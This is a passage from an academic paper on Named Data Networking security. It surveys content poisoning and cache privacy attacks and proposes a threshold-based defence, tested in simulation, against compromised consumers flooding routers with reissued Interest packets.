of the legitimate user will thrash. This will increase the latency and reduce the throughput of the network. Cache privacy attack During an assault on cache privacy, the attacker wants to figure out whether or not the sensitive data has been accessed recently. A newly accessed item lies in the routers’ cache and the requester gets a quick response to these types of data. The intruder compiles a list of content that is vulnerable to privacy and asks them one by one to know whether it is cached or not by noticing the delay in retrieving the content. If the content is identified, the attacker can conclude that a user or a group of users has recently accessed the content. The adversary will know the user’s access pattern using this technique. The content type that is accessed and other related information will also be vulnerable to privacy. Content poisoning attack One of the most crucial attack vectors in NDN is the Content Poisoning Attack. In CPA, the attacker compromises the router, and this malicious router sends a reply to the legitimate request with totally bogus or corrupted content. The contents of intermediate routers that are involved in NDN communication are stored in CS. This poisoned content spreads when other legitimate consumers request the same content. Content in NDN is of three types, that is, legit contents, fake or poisonous contents, and corrupted contents. A valid signature of valid content is generated through the private key of a legit publisher. Similarly, a valid signature of fake content can also be generated with any private key that is not associated with the publisher’s namespace. Whereas the corrupted content does not have a valid signature Ullah et al. (2020). In a Content Poisoning Attack, an attacker takes over a router and replies to incoming interests with corrupted content. Wu et al. (2016) explained that if a consumer requests this corrupted content, it will spread this malicious content on intermediate routers’ content stores. It will result in the spreading of Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 5/24 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ this poisonous content all over the network. This verification is usually performed by Consumers who use the content verification process using the content’s signature. In NDN, every router can verify the arriving contents on its own, but this verification at line speed takes resources, and it is impractical. Gasti et al. (2012) described two ways through which a content poisoning attack can be carried out. The first way is that the attacker compromises the routers, spreading the poisoned content while satisfying the requested interest packets. The second way is that poisoned content is distributed via compromised publishers. Compromised publishers can anticipate the Data that will be in high demand, for example, highlight a famous football match, and create malicious content. So in this way, a compromised producer or router can reply with a malicious data packet against a legitimate interest packet. CPA detection and mitigation approaches Content Poisoning Attack can be detected and mitigated through two major approaches, Collaborative Signature Verification, and the Consumer Dependent approach. The former method is those in which NDN routers collaborate to verify the content’s signature. The latter method uses extra fields in the Interest and Data packets or uses clients’ feedback. Mitigation of CPA using consumer dependent approach As per NDN specification, a consumer verifies all the signatures of the requested data packets. So a feedback-based approach is used to verify the content at the router (Gasti et al., 2012). This approach is the extended version of the NVF technique, as discussed in the previous section. However, this approach has some new challenges, such as there is no trust relationship between the router and the consumers. Consumers can also be compromised, and in this way, false feedback can consume network resources. Ghali, Tsudik & Uzun (2014a) proposed a technique for content ranking calculation and stored in the exclude field of the interest packet, and the range of the values are between 0 and 1. New content is ranked 1, which gets downgraded if rated by consumers and included in the excluded field of the consumer. This approach is somewhat similar to the technique mentioned in Gasti et al. (2012), so it has the same limitations. Ghali, Tsudik & Uzun (2014b) highlighted some of the NDN architecture vulnerabilities, such as the PPKD field and name’s digest are not the essential components of the Interest packet. Also, no such trust model is adopted unanimously by the consumer’s applications to fetch the content’s hash securely. Based on these vulnerabilities, a technique is proposed, which enables an IKB rule to ensure trust. According to this rule, the Interest packet must include the producer’s (content publisher’s) public key. It is also implied that producers should also have the public key in the Data Packets’ KeyLocator field. Its implication on the router is that it should calculate the hash of the public key of the content received and compare it with the PPKD field against its PIT entry. Upon mismatch, the content is discarded but otherwise verified. Upon successful verification, content is forwarded and stored in the content store of that particular router. Yue, Li & Pang (2019) stated that IKB Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 6/24 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ implication for consumers is that it has to acquire and validate the content provider’s public key before initiating the Interest packet for that specific data packet. Trust model can be acquired using three approaches: public keys of the content provider should be installed in the client application, the second one is the universal key name service, and the third one is global search-based service. Also, to reduce the core routers’ workload, the author has proposed that an Interest Key Binding check on the data packet should be performed at the edge routers. In contrast, core routers should perform this check probabilistically. The cons of this approach are that it is assumed that verifying the router is trusted, but it can verify the bogus IKB to be correct if it is malicious. So this scheme lacks scalability and has overhead. DiBenedetto & Papadopoulos (2016) proposed an approach in which consumers, upon verification failure, send a report packet, which will act as feedback to the other entities of the NDN Network. When consumers detect a poisoned content, a special interest packet is generated by the network stack, and the information regarding the poisoned content is stored in this special report packet. When the router receives this special interest packet, it acts as one of the two proposed mitigation options that the author proposed. One is Immediate Failover, and the second one is Probe First. In the first approach, the malicious face is marked with a low priority value for the future. And in the probe first technique, the node, upon receiving the special interest packet known as report packet, stops forwarding the interest packets of the namespaces on which the attack is underway. Also, that particular node informs their next-hop routers about this malicious namespace. Nguyen et al. (2017) explained three vulnerabilities in NDN architecture; the first one is unregistered remote provider, then multicast forwarding and the last one is the best route forwarding. The first vulnerability is that the interest packet can be satisfied with any data packet received from any of the faces. Therefore, a malicious producer can induce malicious content and satisfy it before it gets satisfied by the legit producer. In NDN, faces are registered in the FIB table’s corresponding values, so while doing multicast forwarding, the interest packet is forwarded to all these faces. So, the malicious producers can satisfy the interest packet with its malicious content. A router ignores a similar interest packet in the best route forwarding with the same name and selectors but different nonce when received during the suppression interval of retransmission. The interest received after this interval shall be transferred via the next lowest possible cost; thus, an interest packet can be satisfied with a malicious producer’s poisoned contents. Hu et al. (2018) proposed a comprehensive system to mitigate CPA, and this article is all about identifying security flaws and proposing a mitigation strategy to address this flaw in this system. In the following sections, this base system is elaborated in detail. This system is comprised of three phases. First is the route building phase, then there is a normal content retrieval phase, and the last one is the recovery phase in chase content poisoning. It is required that NDN routers should enable name-key-based forwarding to forward interest towards registered content sources, and to specify legitimate content sources, every route advertisement should be authenticated with a trust management system. If content poisoning occurs on intermediate routers, then a mechanism of Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 7/24 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ “Multipath Forwarding based Inband Probe” is performed. In this approach, an interest packet with an exclude filter (poisoned content) is reissued and forwarded via alternate paths. When this packet reaches a particular router, it enables cached contents’ on-demand signature verification. Verification of cached content is performed between the malicious payload included in the interest packets’ exclude filter or in the Data Packet that is returned and gets matched with the reissued interest packet. There are two benefits of this approach; first, with multipath forwarding, there is a great chance that consumers will acquire the legitimate content while legitimate content can be restored on the intermediate router via alternative forwarding options. This way, poisoned contents will be purged, and for future requests, legitimate contents will be returned from the routers’ cache. Thus it will increase the overall throughput of the network. Comparisons of CPA mitigation approaches Table 2 is a summarized view of the CPA Mitigation approaches, as discussed in previous sections: Based on the analysis of existing techniques and work to detect and mitigate CPA, there is still a need to sort out some challenges while developing a CPA mitigation strategy (Hu et al., 2018). Energy management in routers is an important issue. Gao, Wang & He (2018) evaluated that CPA and caching issues can consume a considerable amount of routers’ energy, which can add instability to the whole system. In Hu et al. (2018) have implemented a robust and efficient mechanism to mitigate the CPA. In Table 3, we have identified vulnerabilities in content poisoning attack mitigation schemes discussed in Table 2 CPA detection and mitigation. References NDN node Detection Mitigation Overhead Gasti et al. (2012) Consumer, Router Signature, PPKD SSCIC, DSCIC Verification of random signatures Ghali, Tsudik & Uzun (2014a) Consumer Signature Content ranking Content ranking calculation Ghali, Tsudik & Uzun (2014b) Router PPKD and signature Interest key binding Signature verification Nam, Kim & Yeom (2015) Router Signature SLRU extension Signature verification Kim et al. (2015) Router Signature SLRU extension Signature verification Wu et al. (2016) Consumer, router Signature Reputation based forwarding Signature verification Kim et al. (2017) Router Signature in case of cache-hit SLRU extension Signature verification DiBenedetto & Papadopoulos (2016) Consumer, router Signature Modified forwarding strategy Complete Bogus packet in reissued interest packet Hu et al. (2018) Consumer, router PPKD and signature Name-key based forwarding and multipath forwarding based inband probe Signature verification (Hash matching is fast due to PPKD entry) Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 8/24 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ previous sections of this article. In the following section, we explore how these vulnerabilities can be exploited and a mitigation strategy is proposed, which is the main research area of this article. PROPOSED APPROACH Introduction The name-key based forwarding and Multipath forwarding based Inband probe is a very comprehensive scheme for mitigation of the CPA. It fills most of the attack surfaces regarding the Content Poisoning Attack. However, with the advent of the NDN architecture’s structural changes, it has induced a new attack vector that can be exploited by the adversary. With this attack, the whole system can collapse. So it is very crucial to highlight this aspect. One of the important attack vectors that have emerged with this technique is the flooding of the reissued Interest Packet containing the excluded filter field. It is the leading research contribution of this article. A consumer with malicious intent can flood the network with interest containing the hash digest of legit or unpoisoned data in its exclude field, which can flood the network and enable multipath. It can harm the throughput of the network or even can cause DDoS. Based on the research gap mention in the previous section, this article has formulated the following research questions: What will be the mechanism to detect the attack initiated by consumers with malicious intent? What will be the parameters that will mitigate the malicious consumers’ reissued interest packet flooding attack? So it’s essential to mitigate and add this additional security feature in this CPA Mitigation technique. Detection of malicious consumer interest packet with excluded filter field During the CPA, the reissued Interest Packet by the consumer stores the hash of the poisoned data in the excluded filter field but a compromised consumer can also store the hash of and un-poisoned data has in the same field. Consequently, It will result in a cache miss. The on-demand signature verification at the router will also be enabled during this process, consuming a lot of router processing power. When a consumer with malicious intent bombards these excluded Interest packets, although they get discarded at the Table 3 Vulnerabilities in CPA mitigation schemes (compromised consumers can flood routers). References Checked by Proposed solution Energy efficient Security features Gasti et al. (2012) Consumer and router SSCIC & DSCIC Yes Cannot detect corrupted content Ghali, Tsudik & Uzun (2014a) Consumer Content ranking algorithm No—Overhead of calculating the content ratings Do not handle malicious consumer in case it reports false content rating DiBenedetto & Papadopoulos (2016) First consumer and then router Modifying forwarding strategy No—uses complete bogus packet in report Only handles the malicious consumer identity but do not handle the corrupted data Hu et al. (2018) First consumer and then router Name-key based forwarding and multipath forwarding based inband probe Yes—only use a PPKD extra field and use bogus/corrupted data hash in excluded filter field of interest packet Can prevent poisoning of content by generating special interest packets Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 9/24 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ next router upon verification, it will drastically increase the router’s processing overhead. Other legitimate consumers will face a denial of service from this router. This attack vector should be taken into account, and a mitigation strategy should be devised for such attacks. This way, the process of CPA mitigation will be severely affected. The block diagram of the flooding scenario is elaborated in Fig. 1. The block diagram depicts the scenario of the flooding attack of Interest Packet with excluded filter. The first block shows that the consumer generates the normal Interest packet. Then a decision is taken in the next block that whether it is a normal Interest packet or an Interest packet with an excluded filter field. In case it is a normal Interest packet, it is directed towards normal NDN operations; otherwise, it is passed to the next module of On-Demand Signature Verification. Here signature verification is performed against PPKD in the Content Store. If validation fails, this packet is discarded; otherwise, it gets purged from the router’s CS. In the case of poisoned Data is found in the CS, the normal process is initiated, and content poisoning mitigation will commence. When a consumer is compromised, and it starts flooding the NDN Network with the excluded filter enabled Interest packet, it will trigger On-Demand Signature verification for each bogus packet, and the next NDN router will get saturated. The queue will be occupied, and after a while, there will be less space for the legitimate excluded filter Interest packet. It will hamper the CPA Mitigation mechanism badly. So this scenario is considered an attack and needs mitigation. Figure 1 Detection of flooding attack during content poisoning attack mitigation. Full-size DOI: 10.7717/peerj-cs.435/fig-1 Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 10/24 http://dx.doi.org/10.7717/peerj-cs.435/fig-1 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ Mitigation of flooding attack In this article, a reactive approach is proposed to mitigate this attack. A virtual queue is utilized in NDN Routers for incoming reissued Interest packets from the consumers. FIFO (FCFS) queue is shared among all the incoming faces for reissued interest packets. It is a temporary place holder for these packets until they get verified. The allotted memory for the transmitting packets should be different from the one used for caching. If the same CS is used to transmit packets and data chunk, then the CS will be congested with the data chunks that are waiting to be satisfied by the pending Interest packets. To prevent the Malicious consumer from sending a fake “excluded Interest packet,” a satisfaction test is performed to check if the excluded interest packet is non-existent in the cache or a legit packet in the cache. In case a cache miss (of the excluded interest packet) occurs, and the ratio reaches near the threshold value, that is, it is set by the operator, it is considered an attack. On-demand verification at the router is not enabled unless there is a cache hit of the excluded interest packet; this will reduce the overhead of content verification at each data packet’s router. However, in case of a cache miss, this excluded interest packet is discarded. Still, if a consumer with malicious intent floods the edge router with the fake interest packet with the excludes filter, it will degrade that particular edge router’s performance. The NDN-router service manager at the NDN Router, especially at the edge of the network in the consumer domain, maintains the stats and looks at them. The router will drop the future reissued interests coming from this face with the excluded data packet as it is considered a malicious consumer upon hitting the threshold value. It will be done temporarily and delisted at the discretion of the network operator. A new lightweight parameter is added in the CS Data Structure to retain the cache miss counter of invalid reissued Interest packet with excluded filter field. This value is compared with the threshold value. The Block diagram can show the birds-eye view of this proposed mechanism in Fig. 2. We have introduced a block of the proposed approach. The reissued Interest packet upon several caches misses, and hitting the specified threshold value will trigger an event and blocks this malicious face. On the next iteration, this reissued packet from the malicious consumer face will be blocked. In Algorithm 1 (Fig. 3) PPKD, ContentName, nonce, incoming face, excluded filter field value, Threshold value, and cache miss counter value is passed as an argument. At statement 1, the hash comparison is performed and if the result is a cache miss then the cache miss counter value gets incremented. If that value reaches the threshold value then the event to block that specific malicious incoming face gets triggered. In case the result is a cache hit then the normal NDN communication process will commence. Dynamic threshold value This approach helps the Network Operators set up the threshold value automatically during the special interest packet flooding attack by a malicious consumer. This approach aims to select the threshold value in an automated fashion based on the statistical monitoring of buffer capacity and cache miss ratio. In this approach, a Network Management software continuously monitors the cache miss ratio and buffer capacity Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 11/24 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ when a special interest packet is initiated. When the cache miss ratio average over a while results in a buffer overflow, the threshold value is thrashed to half. This process continues unless the threshold value becomes 1. This mechanism is elaborated in Algorithm 2 (Fig. 4). At this stage, the incoming face causing the flooding attack will get blocked till the particular timeout. InitTH ¼ QueueSize=VerificationRate (1) Cache Miss Ratio ¼ CM=ðCM þ CHÞ (2) Network Management Software will continuously monitor the Cache_Miss_Ratio and Buffer Size of the queue. Benefits of dynamic threshold values over static threshold values The mitigation of flooding attack of special interest packets works on two approaches, first one uses the static threshold values which is set by network operators during the router Figure 2 Mitigation of flooding attack. Full-size DOI: 10.7717/peerj-cs.435/fig-2 Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 12/24 http://dx.doi.org/10.7717/peerj-cs.435/fig-2 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ initial configuration. The second approach is the dynamic approach, in which the threshold value is adjusted adaptively by monitoring the Queue size and Cache Miss Ratio value. EXPERIMENTAL RESULTS Simulation environment For proof of concept and to run this scenario, a custom-built NDN Simulator is developed in C# language in Visual Studio 2019. The network parameters used in simulation scenarios are mentioned in Table 4. Figure 3 Detection and mitigation of flooding attack of reissued interest packet. Full-size DOI: 10.7717/peerj-cs.435/fig-3 Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 13/24 http://dx.doi.org/10.7717/peerj-cs.435/fig-3 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ Network topology Scenario 1: one malicious consumer In scenario 1, our simulations’ network topology consists of two routes from the consumer to the producer. Two paths routes that are used in this scenario are 0-1-2-4-6-7-8 and 0-1-3-5-7-8; these paths are between the consumer and a producer (Spring et al., 2004). In this scenario, it is evident that consumers with malicious intent can flood the network with unwanted interest packets with excluded fields occupied by the non-malicious or legit payload. If not mitigated at the edge router, all the routers will enable the on-demand verification, and this way, router performance will degrade with time. This problem can be mitigated by enabling a mechanism at edge routers of NDN and setting a threshold value that if it hits this value, block that interface through which these malicious excluded interest packets are coming. This way, the rest of the network will be safe from acquiring this malicious packet from consumers, and ultimately the performance of the intermediate routers will not be degraded. So to handle this issue Network Manager at NDN Edge Figure 4 Dynamic threshold value. Full-size DOI: 10.7717/peerj-cs.435/fig-4 Table 4 Simulation parameters. Parameter Default value Request rate 100 Interests/second/consumer (interest with exclude parameter) Max queue length 500 (Experiment 1 and Experiment 2) 1,000 (Experiment 3 and Experiment 4) Verification of interest packet 25 Interest/second No. of malicious consumers 1 (Experiment 1 and Experiment 2) 2 (Experiment 3 and Experiment 4) Threshold value x Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 14/24 http://dx.doi.org/10.7717/peerj-cs.435/fig-4 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ Router enables this mechanism in which malicious interest packet with exclude field is dropped in case of a cache miss, and upon hitting the threshold value, the interface from which these excluded interest packets are received is blocked and added to the delist data structure. The timeout to get out of this delist data structure is at the desecration of the network operator. Scenario 2: two malicious consumers In scenario 2, our simulations’ network topology consists of two routes from two consumers (i.e., Consumer 1 and Consumer 2) of the same domain to the producer via Router 8 (edge router). The routes that are used in this scenario is 0-1-2-4-6-7-8 and 0-1-3-5-7-8; these paths are between the consumer and a producer (Spring et al., 2004). The main thing to note in this scenario is that Consumer 1 and Consumer 2 are in the same domain. Router 8, the virtual queue for Incoming Reissued Interests, is shared between these two consumers. The Queuing mechanism used in this scenario is FIFO. There are two consumers with malicious intent in this scenario and can flood the network with unwanted interest packets with excluded fields occupied by the non-malicious or legit payload. If not mitigated at the edge router, the virtual queues will be fully occupied for the legit reissued interest packet, and consequently, packets will drop. This problem can be mitigated by enabling a mechanism at edge routers of NDN and setting a threshold value that if it hits this value, block that interface through which these malicious excluded interest packets arrive. This way, the rest of the network will be safe from acquiring this malicious packet from consumers, and ultimately the performance of the intermediate routers will not be degraded. Experiments and result Experiment 1 (Scenario 1): with no threshold values In this experiment as shown in Fig. 5, we have calculated the cache miss ratio of the interest packet containing the exclude filter and compared it with the Queue Length. Upon flooding the router with a fake interest packet, the verification process takes time, and Figure 5 Flooding attack with no threshold value and with one malicious consumer. Full-size DOI: 10.7717/peerj-cs.435/fig-5 Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 15/24 http://dx.doi.org/10.7717/peerj-cs.435/fig-5 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ meanwhile, the queue of interest packets will start increasing. After every second, 25% fake packet will drop, and 75% will be added to the queue. Initially, no threshold value is set. After some time, congestion at the router’s incoming interest packet queue will occur, resulting in a drop of other future packets at this router. Experiment 2 (Scenario 1): with threshold values In the second experiment as shown in Fig. 6, our proposed scheme is enabled at the edge routers in Network Management software. After several cache misses and upon hitting the threshold value to 3 according to the simulation settings, it will block the incoming face of the consumer, and further, no more interest packets will be received from this malicious consumer face. After hitting the specified threshold value, the face is blocked and fake packets begin to drop from the queue. At 12 s the queue will be empty and the router is no more saturated. Experiment 3 (Scenario 2): with no threshold values In the third experiment as shown in Fig. 7, Consumer 1 starts flooding the network with fake interest packets with the excluded filter; the queue will begin to saturate as the verification rate is slow as compared to the flooding rate. In the 6th second, Consumer 2 also starts to flood the network; consequently, the queue begins to saturate linearly. Initially, no threshold value is set, and at the 9th-second congestion at the router’s incoming interest packet queue will occur which will result in a drop of other future packets at this router. Experiment 4 (Scenario 2): with threshold values In the fourth experiment as shown in Fig. 8, our proposed scheme is enabled at the edge routers in Network Management software. Upon cache miss threshold value reaches 3, it will block the incoming face of Consumer 1 after three failed verification at 4th second. Further, no interest will be received from this malicious consumer face. At 6th second, Figure 6 Flooding attack with threshold value and with one malicious consumer. Full-size DOI: 10.7717/peerj-cs.435/fig-6 Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 16/24 http://dx.doi.org/10.7717/peerj-cs.435/fig-6 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ Malicious Consumer 2 starts to saturate the queue which will, and similarly, after three failed attempts, this face gets blocked as well, and queues start to thrashed after both of the malicious consumer faces are blocked. Dynamic threshold value It is evident in the experiment that with the increase in the Cache_Miss_Ratio, the Queue size will increase because the flooding rate is greater than the verification rate. Also, Cache_Miss has a penality on the processor of the router, which can increase the processing overhead. In the graph (Fig. 9), the initial threshold value is set to buffer size divided by the packet verification rate. At 7th second the queue is filled up to 100%. At this stage, the new packets will start to drop. Here, the system should act prudently and reduce the threshold value to half of the current value, and if flooding continues threshold value is reduced to half as shown in Fig. 10, and so on till the value is reduced to 1. At this stage, the incoming face is blocked as it is considered as an attack. The queue will not be saturated, and memory will be available for other interest packets to get processed. Figure 8 Flooding attack with threshold value and with two malicious consumers. Full-size DOI: 10.7717/peerj-cs.435/fig-8 Figure 7 Flooding attack with no threshold value and with two malicious consumers. Full-size DOI: 10.7717/peerj-cs.435/fig-7 Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 17/24 http://dx.doi.org/10.7717/peerj-cs.435/fig-8 http://dx.doi.org/10.7717/peerj-cs.435/fig-7 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ If the flooding attack continues, we will multiplicatively decrease the threshold value to another half. This mechanism will continue against that particular flooding malicious face until the threshold value reaches 1. At this stage, that particular face will be blocked and considered as a malicious face. The face will be blocked until the timeout, whose value will be at the network operator’s discretion. Figure 10 Special interest packet flooding with dynamic threshold value. Full-size DOI: 10.7717/peerj-cs.435/fig-10 Figure 9 Special interest packet flooding without dynamic threshold value. Full-size DOI: 10.7717/peerj-cs.435/fig-9 Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 18/24 http://dx.doi.org/10.7717/peerj-cs.435/fig-10 http://dx.doi.org/10.7717/peerj-cs.435/fig-9 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ Effectiveness and accuracy of proposed solution by comparing the throughput of the normal special interest packets The simulation scenario is depicted in Table 5. In the first scenario, 2,000 malicious interest packets are bombarded by one compromised consumer. A total of 1,000 Normal Interest Packets were also induced in the system by a legitimate consumer in the same domain. In this scenario, no threshold value is set. The maximum throughput of a particular face is 100 bps. Initially, the throughput of the normal interest packets was up to 90% of the total capacity which is the desired result. But in the subsequent seconds, the Malicious packets entered the router. Queue capacity started to saturate, the throughput of the normal interest packet will start to drop as the queue gets filled up with the bombarded malicious packets. The processing overhead also started to increase because of the cost of the cache-miss penalty and verification overhead. This scenario is depicted in Fig. 11. In this second scenario, again 2,000 malicious interest packets are bombarded by one compromised consumer. A total of 1,000 Normal Interest Packets were also induced in the system by a legitimate consumer in the same domain. In this scenario, our proposed solution is placed and activated inside the NDN Router service manager. The maximum throughput of a particular face is 100 bps. The throughput of the normal interest packets was up to 90% of the total capacity which is the desired result. But in the subsequent seconds, the Malicious packets entered the router. Queue capacity started to saturate, then the proposed solution gets activated and blocks the malicious face when the cache miss counter value reached the threshold value. Then we can see that according to our simulation environment after 3rd-second malicious packets didn’t enter the router queue and throughput of the normal interest packet will start to raise and other factors like processing overhead and queue capacity ratio get into the normal working range. This scenario is depicted in Fig. 12. A total of 2,000 Malicious Packets bombarded were detected and dropped successfully by our system. System accuracy proved to be 100%. Also, 1,000 legitimate special Interest packets were processed and no packet was dropped. Comparison of throughput, queue capacity and processing overhead during the CPA special interest packet flooding attack and that of our proposed approach is summarized in Table 6. Table 5 Simulation parameters for effectiveness of proposed approach. Parameter Default value Request rate 100 Interests/second/consumer (special interest packets) Interest packet max queue length 500 Verification of interest packet 25 Interest/second Number of malicious special interest packets 2,000 pkts Number of normal special interest packets 1,000 pkts Number of malicious consumers 1 Threshold value x Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 19/24 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ Figure 11 Throughput of the normal special interest packets in flooding attack scenario. Full-size DOI: 10.7717/peerj-cs.435/fig-11 Figure 12 Throughput of the normal special interest packets in flooding attack scenario with proposed mitigation strategy. Full-size DOI: 10.7717/peerj-cs.435/fig-12 Table 6 Comparison of throughput, queue capacity and processing overhead during special interest packet flooding attack. Category Proposed approach DiBenedetto & Papadopoulos (2016) Min throughput of normal interest packet 65% 12% Max queue occupation 55% 95% Reporting packet size Lightweight (Sha256 Hash - 32 Bytes) Heavyweight (complete packet) Trust anchor Yes Yes Max processing overhead 53% 93% Compromised consumer detection Yes Yes Bogus report packet detection Yes Partial Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 20/24 http://dx.doi.org/10.7717/peerj-cs.435/fig-11 http://dx.doi.org/10.7717/peerj-cs.435/fig-12 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ Effectiveness and efficacy of proposed solution by comparing the throughput of interest packets and queue capacity is elaborated in experiments as in Figs. 11 and 12 which is summarized in Table 6. It is evident from the experiments that during the Special Interest Packet flooding attack, our proposed approach showed promising results in terms of throughput, queue capacity and processing overhead. CONCLUSION AND FUTURE DIRECTION The main contribution of this work is to devise a mechanism that identifies and prevents the compromised consumers from flooding the network with special Interest packets that are generated during the mitigation process of the Content Poisoning Attack. The compromised consumers place the hash of an un-poisoned content in the excluded filter field of the special interest packet which causes cache miss at the edge router. Owing to the bombardment of these special Interest packets, it will tremendously increase the processing overhead on the NDN Router. The cost is in terms of Cache-Miss penalty and verification overhead. Also, the queue capacity of the NDN Router gets saturated. Consequently, the legitimate requests from the other consumers get dropped or face a substantial amount of delays. We also observed the damaging effect of multiple malicious consumers flooding the edge router which was also well handled by using the proposed technique. After the implementation of our scheme in the Network Service manager at the NDN Edge Router, the malicious face will be blocked when the cache-miss ratio value reaches the specified threshold value. We also have made the threshold value dynamic by adjusting the initial threshold according to cache-miss ratio and queue capacity values. An improvement in this technique can be done by incorporating Quality of Service solutions in NDN Routers. Multiple Virtual queues for special Interest packets can be maintained in NDN Routers to handle the flooding of these packets. Different queuing disciplines and algorithms like Adaptive Virtual Queue (AVQ), Credit-Based Fair Queuing, Weighted Fair Queuing, Quick Fair Queueing, and Class-Based Queuing can be tested to augment our approach. Also, traffic shaping and rate control mechanism can be used to hold back the malicious face. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Masood Ur-Rehman is an Academic Editor for PeerJ. Author Contributions � Adnan Mahmood Qureshi conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 21/24 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ � Nadeem Anjum conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Rao Naveed Bin Rais conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � Masood Ur-Rehman performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Amir Qayyum analyzed the data, authored or reviewed drafts of the paper, provided the logistics to perform experiments, and approved the final draft. Data Availability The following information was supplied regarding data availability: Code is available at Figshare: Qureshi, Adnan (2021): MyNDNSim.zip. figshare. Software. DOI 10.6084/m9.figshare. 13587650.v1. REFERENCES Ahlgren B, Dannewitz C, Imbrenda C, Kutscher D, Ohlman B. 2012. A survey of information- centric networking. IEEE Communications Magazine 50(7):26–36 DOI 10.1109/MCOM.2012.6231276. Benmoussa A, Tahari AEK, Kerrache CA, Lagraa N, Lakas A, Hussain R, Ahmad F. 2020. MSIDN: mitigation of sophisticated interest flooding-based DDOS attacks in named data networking. Future Generation Computer Systems 107(7):293–306 DOI 10.1016/j.future.2020.01.043. Benmoussa A, Tahari AEK, Lagaa N, Lakas A, Ahmad F, Hussain R, Kerrache CA, Kurugollu F. 2019. A novel congestion-aware interest flooding attacks detection mechanism in named data networking. In: 2019 28th International Conference on Computer Communication and Networks (ICCCN), 29 July–1 Aug. 2019, Valencia, Spain. 1–6. DiBenedetto S, Papadopoulos C. 2016. Mitigating poisoned content with forwarding strategy. In: 2016 IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS). Piscataway: IEEE, 164–169. Gao M, Wang K, He L. 2018. Probabilistic model checking and scheduling implementation of energy router system in energy internet for green cities. IEEE Transactions on Industrial Informatics 14(4):1501–1510 DOI 10.1109/TII.2018.2791537. Gasti P, Tsudik G, Uzun E, Zhang L. 2012. DoS & DDoS in named-data networking. In: Proceedings - International Conference on Computer Communications and Networks, ICCCN, Nassau, Bahamas. 1–7. Ghali C, Tsudik G, Uzun E. 2014a. Needle in a haystack: mitigating content poisoning in named-data networking. In: NDdSS Symposium, 23 February 2014, San Diego, CA, USA. Ghali C, Tsudik G, Uzun E. 2014b. Network-layer trust in named-data networking. ACM SIGCOMM Computer Communication Review 44(5):12–19 DOI 10.1145/2677046.2677049. Hassanein H, Zulkernine M. 2015. A survey of security attacks in information centric networking. IEEE Communications Surveys & Tutorials 17(1):1–5 DOI 10.1109/COMST.2015.2406352. Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 22/24 https://dx.doi.org/10.6084/m9.figshare.13587650.v1 https://dx.doi.org/10.6084/m9.figshare.13587650.v1 http://dx.doi.org/10.1109/MCOM.2012.6231276 http://dx.doi.org/10.1016/j.future.2020.01.043 http://dx.doi.org/10.1109/TII.2018.2791537 http://dx.doi.org/10.1145/2677046.2677049 http://dx.doi.org/10.1109/COMST.2015.2406352 http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ Hu X, Gong J, Cheng G, Zhang G, Fan C. 2018. Mitigating content poisoning with name key based forwarding and multipath forwarding based in band probe for energy management in smart cities. IEEE Access 6:39692–39704. Jacobson V, Smetters DK, Thornton JD, Plass MF, Briggs NH, Braynard RL. 2009. Networking named content. In: Proceedings of the 5th International Conference on Emerging Networking Experiments and Technologies, CoNEXT ’09. New York: Association for Computing Machinery, 1–12. Kim D, Bi J, Vasilakos A, Yeom I. 2017. Security of cached content in NDN. IEEE Transactions on Information Forensics and Security 12(12):2933–2944 DOI 10.1109/TIFS.2017.2725229. Kim D, Nam S, Bi 